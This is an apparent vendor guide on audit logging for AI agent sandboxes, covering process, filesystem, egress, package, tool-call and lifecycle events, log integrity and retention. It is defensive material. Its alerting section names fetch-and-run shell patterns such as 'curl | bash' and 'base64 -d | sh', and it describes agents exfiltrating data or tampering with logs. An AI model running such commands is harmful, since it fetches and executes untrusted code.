- Why AI Agent Sandboxes Need Different Audit Logging
- Command and Process Execution Logs
- Filesystem Access Events
- Outbound Network Calls and Egress Logging
- Package Install Events
- Tool Invocations and Results
- Session Lifecycle Events
- Resource Limit Events
- Structured vs Unstructured Log Formats
- Log Integrity and Tamper Evidence
- Audit Log Retention Policies for AI Agent Sandboxes
- Surfacing Logs for Incident Response
- What to Ask Your Sandbox Provider
- Conclusion
- FAQ
Audit logs for AI agent sandboxes must capture command and process execution, file reads and writes, outbound network calls and egress destinations, package install events, tool invocations, model input and output summaries at the session level, resource limit hits, and session lifecycle events. Without that coverage, a security team cannot reconstruct what an agent did, trace a compromise, or satisfy a post-incident review. Gaps in any of these categories leave blind spots that are difficult or impossible to close retroactively.
Why AI Agent Sandboxes Need Different Audit Logging
Traditional server audit logs assume that a human or a deterministic application process triggered each action. AI agents break that assumption. A single prompt can cause a session to install packages, write files, run shell commands, call external APIs, and spawn subprocesses — all within seconds, with no human approval for individual steps.
This changes what an audit log needs to answer. For a traditional server, the question is usually “did an authorized user change this file?” For an agent sandbox, the questions are:
- What did the model decide to execute, and in what order?
- Which shell commands ran, and as which process?
- Did the agent access files it was not expected to touch?
- What left the sandbox over the network, and where did it go?
- Did a package install introduce unexpected code?
- What was the agent doing when it hit a resource limit or was terminated?
A log system that can answer those questions gives security teams the reconstruction capability they need. A log system that cannot leaves incident response guessing.
Command and Process Execution Logs
Process execution is the highest-priority category. Every command the agent runs — directly or through a shell subprocess — should produce a log entry that includes: the process name and full argument list, the parent process and PID, the user and effective UID, the working directory, the timestamp with sub-second precision, and the exit code.
Without the argument list, commands like python, curl, or bash are nearly meaningless in a post-incident trace. Without the UID, you cannot tell whether the agent ran with elevated privileges. Without the parent PID chain, you cannot reconstruct nested subprocesses or understand how a command was invoked.
Linux audit subsystems like auditd with appropriate syscall rules (execve, execveat) can capture this at the kernel level inside a microVM guest. Container-based sandboxes can use eBPF-based tracing or seccomp logging as an alternative, though each approach has different coverage and performance tradeoffs. The key requirement from a security team’s perspective is that the log is generated below the application layer — an agent process that controls its own logging cannot be trusted to report its own behavior accurately.
Filesystem Access Events
Filesystem audit coverage should log reads, writes, deletes, renames, and mount operations. For each event, the log should include: the operation type, the full path, the process and PID responsible, the UID, and the timestamp.
In practice, logging every file read in a busy sandbox can generate high volume. Security teams often narrow this to sensitive paths — for example, any path under /etc, /root, the agent’s workspace directory, credential file locations, and mounted secrets. Writes and deletes are higher priority than reads for most threat models, but reads of credential or configuration files are worth capturing regardless.
Filesystem events are particularly useful for identifying data exfiltration attempts (large reads followed by outbound network calls), unexpected configuration changes (writes to files the agent should not touch), and cleanup behavior (deletes executed at the end of a session, which may indicate an attempt to hide activity).
Outbound Network Calls and Egress Logging
Egress logging is one of the most commonly underspecified areas in agent sandbox deployments. Many sandboxes log that a network connection was attempted; far fewer log where it went, what protocol was used, and whether it succeeded.
Complete egress log entries should include: the destination IP address and port, the resolved domain name (DNS query and answer), the protocol (TCP, UDP, HTTP, etc.), the bytes transferred in each direction, the process that opened the connection, the UID, and the timestamp.
DNS query logging is separately important. An agent that queries an unexpected domain — even if the connection is later blocked — is a signal worth capturing. DNS over HTTPS can bypass query logging unless the sandbox enforces network policy at a level that intercepts it.
Sandboxes that provide allow-list-based egress controls should log both allowed and blocked connection attempts. A high volume of blocked attempts to unexpected destinations is itself a meaningful security signal.
Package Install Events
Package installs are a high-value audit target because they change the runtime environment in ways that persist for the duration of the session and potentially affect downstream operations. Each install event should capture: the package manager invoked (pip, npm, apt, cargo, etc.), the package name, the requested version, the resolved version, the source URL or registry, the package hash or checksum, the process and UID, and the timestamp.
The source URL matters. A package installed from a private registry, a direct URL, or an unusual mirror is a different risk profile than one installed from the default public registry. The hash matters for post-incident verification — if a package was later found to be malicious, you want to know whether that exact version was installed in a given session.
Sandboxes that block package installs entirely eliminate this risk category but also significantly constrain what agents can do. Most production deployments need a middle path: log everything, allow installs from an approved source list, and flag or block installs from unknown sources.
Tool Invocations and Results
AI agents typically operate through a tool-call mechanism where the model requests a named action — run code, read file, call API, search the web — and the orchestration layer executes it. These tool invocations sit above the OS level and are application-layer events, but they are important to log because they represent the model’s intent rather than just the system-level consequence.
Tool invocation logs should capture: the tool name, a summary of the input parameters (not the full content if it would include secrets or user PII), a summary of the result status (success, error, timeout), the session ID, and the timestamp.
Logging the full input and output of every tool call is useful for debugging but creates privacy and secret-leakage risks. A practical approach is to log tool names and status unconditionally, log input/output summaries at a configurable verbosity level, and provide a way to retrieve full detail for specific sessions during an investigation with appropriate access controls.
The goal is enough signal to reconstruct the agent’s action sequence without creating a log store that itself becomes a high-value target.
Session Lifecycle Events
Session lifecycle events anchor all other log entries. A session ID that appears in every event type makes it possible to join logs across categories and answer “what happened in this specific run?”
Lifecycle events to log:
| Event | Key fields |
|---|---|
| Session create | session ID, user/tenant ID, template or image name, resource config, timestamp |
| Session start | session ID, host identifier, assigned resource limits, timestamp |
| Session pause | session ID, reason (API call, timeout, autopause), timestamp |
| Session resume | session ID, resuming actor, timestamp |
| Session terminate | session ID, termination reason (normal, timeout, OOM, API call, policy violation), exit status, timestamp |
| Session cleanup | session ID, filesystem state at cleanup (preserved, deleted, snapshot saved), timestamp |
The termination reason is especially useful post-incident. A session that terminated due to a policy violation, an OOM kill, or an unexpected signal rather than a clean exit is worth examining more closely. Sessions that were paused and resumed are worth examining for state continuity — did anything change in the environment between pause and resume?
Resource Limit Events
Resource limit events capture moments when a session hit a configured ceiling and the system took action. These events signal either normal high-load behavior or something more concerning — a runaway process, an unexpected computation burst, or a deliberate attempt to exhaust resources.
Log entries for resource limit events should include: the limit type (CPU throttle, memory OOM, disk quota, network rate limit, timeout), the measured value at the time of the event, the configured limit, the action taken (throttle, kill, warn), the process or session affected, and the timestamp.
OOM kills are particularly worth examining because they may indicate an agent attempting a large computation that was not expected, a package that loaded unexpectedly large data, or a memory leak. CPU throttle events in a session that should only be doing lightweight LLM calls may indicate that something else is running inside the sandbox.
Structured vs Unstructured Log Formats
Unstructured logs — free-text lines like 2026-06-29 10:04:00 INFO: process python started — are readable but difficult to query, aggregate, or integrate with a SIEM or alerting pipeline. For audit purposes, they require parsing that breaks when the log format changes.
Structured logs — typically JSON or a common schema format like CEF or OCSF — allow every field to be indexed, queried, and alerted on directly. A structured execve event that includes {"ts": "2026-06-29T10:04:00.123Z", "event": "process.exec", "session_id": "...", "pid": 1234, "ppid": 1, "uid": 0, "cmd": "curl", "args": ["-s", "https://..."], "exit_code": 0} is immediately queryable by any of its fields.
For security teams evaluating a sandbox provider, the key questions are:
- Are logs structured or unstructured?
- What schema or format is used, and is it documented?
- Can logs be streamed in real time to an external SIEM or log aggregation system?
- What is the latency between an event and its availability in the log stream?
Real-time or near-real-time streaming is important for detection use cases. A log that is only available hours after a session ends is useful for incident reconstruction but not for live alerting.
Log Integrity and Tamper Evidence
An audit log that the agent can modify is not an audit log. This is the tamper evidence requirement: the log must be generated and stored in a way that the agent process cannot alter, delete, or suppress its own entries.
At the implementation level, this typically means:
- Kernel-level log generation (audit subsystem, eBPF) rather than application-level logging inside the sandbox
- Log shipping to an external destination that the sandbox process cannot reach
- Write-once or append-only log storage with no delete API accessible from the sandbox network
- Log entries signed or checksummed on generation so that tampering or truncation is detectable after the fact
For managed sandbox providers, the relevant question is whether the agent’s process has any path to modify log delivery. If logs are written to a file inside the sandbox and then shipped, a sufficiently privileged agent process may be able to interfere with shipping. If logs are generated at the hypervisor or host level and shipped out of band, the agent has no access.
Chain of custody for log data — particularly important for compliance or legal review — requires that the log collection path, storage access controls, and any transformations applied to raw events are documented and auditable themselves.
Audit Log Retention Policies for AI Agent Sandboxes
Retention requirements for AI agent sandbox audit logs depend on the regulatory environment, the risk profile of the workloads, and the incident response timeline the security team needs to support.
Practical starting points for security teams to evaluate:
| Use case | Suggested minimum retention |
|---|---|
| Active incident investigation | Hot/queryable for at least 90 days |
| Post-incident forensics | Available in cold storage for 12–24 months |
| Compliance review (SOC 2, ISO 27001) | Per applicable framework requirements |
| Legal hold | Until explicitly released |
For AI agent workloads, 90 days of hot storage is a meaningful baseline because compromise patterns in autonomous agents may not be discovered immediately — an agent that exfiltrated data during a session three weeks ago may not be identified until a downstream anomaly is noticed.
Volume is a real cost factor. A sandbox running thousands of sessions per day with full execve and network logging can generate significant data. Tiered storage — hot for recent data, warm for medium-term, cold for archival — is a common approach. Compression and field-level filtering (logging only high-priority event types at full fidelity) are also worth considering, with the tradeoff that filtered logs may miss unexpected event types.
Surfacing Logs for Incident Response
Collecting logs is necessary but not sufficient. Logs that sit in a bucket nobody queries offer no protection. For security teams, the operational requirement is to be able to answer specific questions quickly:
- What did session X do between time T1 and T2?
- Which sessions accessed path P?
- Which sessions made outbound connections to domain D?
- Which sessions installed package V?
- Which sessions terminated with reason R?
This requires a query interface — either a SIEM integration, a log analytics platform, or a provider-supplied API — where session ID, event type, timestamp range, path, domain, and other key fields are indexed and searchable.
Alerting on specific patterns is the second layer. High-priority signals for AI agent sandboxes include: execution of known-dangerous commands (curl | bash, wget -O - | sh, base64 -d | sh), outbound connections to unexpected or newly registered domains, package installs from non-registry URLs, write events to credential file paths, sessions that terminate with policy violation or OOM kill, and any event occurring under UID 0 when the agent should not be running as root.
Pre-built detection rules calibrated for agent sandbox behavior patterns reduce the time to first alert for novel activity. Security teams evaluating sandbox providers should ask whether the provider supplies detection rules, log schema documentation, and sample SIEM integrations, or whether building that layer is left entirely to the customer.
What to Ask Your Sandbox Provider
When evaluating an AI agent sandbox for audit log coverage, these are the concrete questions worth putting to a provider:
- What event categories are logged by default, and what requires configuration?
- Are logs generated at the kernel/hypervisor level, or inside the sandbox process?
- What structured log format is used, and is the schema publicly documented?
- Can logs be streamed in real time to an external destination?
- What is the data retention policy, and can it be extended?
- Does the sandbox process have any path to modify or suppress its own log entries?
- Are log entries signed or otherwise tamper-evident?
- Is there a query API or SIEM integration available?
- Are there pre-built detection rules or alerting templates for common sandbox threat patterns?
No sandbox deployment is complete on logging by default. Gaps between what a provider collects and what a security team needs to reconstruct an incident are common. Identifying those gaps before deployment, rather than after an incident, is the practical payoff from this kind of evaluation.
Novita Agent Sandbox provides session lifecycle events, execution logs, and resource metrics accessible through its API. Security teams evaluating Novita Agent Sandbox should verify current log coverage, export options, and retention configuration in the product documentation before making architecture decisions.
Conclusion
Audit logging for AI agent sandboxes is not a feature you can retrofit after an incident. The event categories that matter — process execution, filesystem access, egress traffic, package installs, tool invocations, session lifecycle, and resource limits — need to be in scope before a workload goes into production, and the log collection path needs to be outside the agent’s reach.
The practical checklist for security teams is straightforward: identify which event categories your sandbox provider captures by default, confirm logs are generated at the kernel or hypervisor level rather than inside the agent process, verify that structured output is available for SIEM integration, and establish retention policies before you need them for an investigation.
Gaps in any of these areas are gaps in your ability to answer “what did this agent do?” — and for autonomous agents operating at scale, that question will eventually need an answer.
FAQ
What events should AI agent sandbox audit logs capture?
At minimum: command and process execution (with full argument lists), filesystem reads/writes/deletes, outbound network connections and DNS queries, package install events with source URLs and hashes, tool invocations and result status, session lifecycle events (create, pause, resume, terminate, cleanup), and resource limit events (CPU throttle, OOM kill, timeout). Missing any of these categories leaves blind spots that cannot be reconstructed after the fact.
Why can’t I rely on application-level logging inside the sandbox?
An agent process that controls its own logging can suppress or modify entries about its own behavior — intentionally or through a bug. Kernel-level collection (via auditd, eBPF, or hypervisor instrumentation) generates log entries below the application layer, where the agent has no write access. This is the tamper-evidence requirement: the log must be generated in a location the agent cannot reach.
How long should AI agent sandbox audit logs be retained?
A practical baseline: 90 days in hot queryable storage for active investigation, 12–24 months in cold storage for post-incident forensics. Compliance frameworks like SOC 2 and ISO 27001 have their own requirements that may supersede these baselines. For legal holds, retention should continue until explicitly released by legal counsel.
What is the difference between structured and unstructured audit logs?
Unstructured logs are free-text lines that require parsing to query. Structured logs use a consistent schema (JSON, CEF, OCSF) where every field is indexed and queryable directly. For security operations, structured logs are significantly easier to integrate with SIEM platforms, write detection rules for, and query during incident response.
Can an AI agent tamper with its own audit logs?
It depends on where logs are generated and stored. If logs are written to a file inside the sandbox and shipped externally, a privileged agent process may interfere with the shipping pipeline. If logs are generated at the hypervisor or host level and written directly to an external destination that the sandbox network cannot reach, the agent has no path to modify them. Always verify the log collection architecture, not just the log format.
What should I look for in a sandbox provider’s audit log documentation?
Confirm: which event categories are logged by default versus requiring configuration; whether logs are generated at the kernel/hypervisor level or inside the sandbox process; what structured format and schema is used; whether real-time streaming to external systems is supported; what the default retention policy is and whether it can be extended; and whether pre-built detection rules or SIEM integrations are available.
